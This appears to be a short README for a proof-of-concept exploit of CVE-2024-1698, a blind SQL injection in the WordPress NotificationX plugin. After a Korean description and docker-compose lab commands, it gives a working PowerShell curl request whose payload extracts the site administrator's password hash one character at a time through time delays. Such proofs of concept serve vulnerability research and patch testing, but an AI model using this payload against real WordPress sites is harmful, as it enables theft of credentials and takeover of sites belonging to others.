
CVE-2024-1698에 대한 개념 증명 익스플로잇, WordPress NotificationX 플러그인의 블라인드 SQL 인젝션 취약점으로, 데이터베이스로부터 시간 기반 데이터 추출을 가능하게 합니다.
docker-compose up --build
docker-compose down
Measure-Command {
curl.exe http://localhost/wp-json/notificationx/v1/analytics `
-Method Post `
-Body 'nx_id=1337&type=clicks`=IF(ASCII(SUBSTRING((select user_pass from wp_users where id=1),1,1))=36,SLEEP(10),null)-- -'
}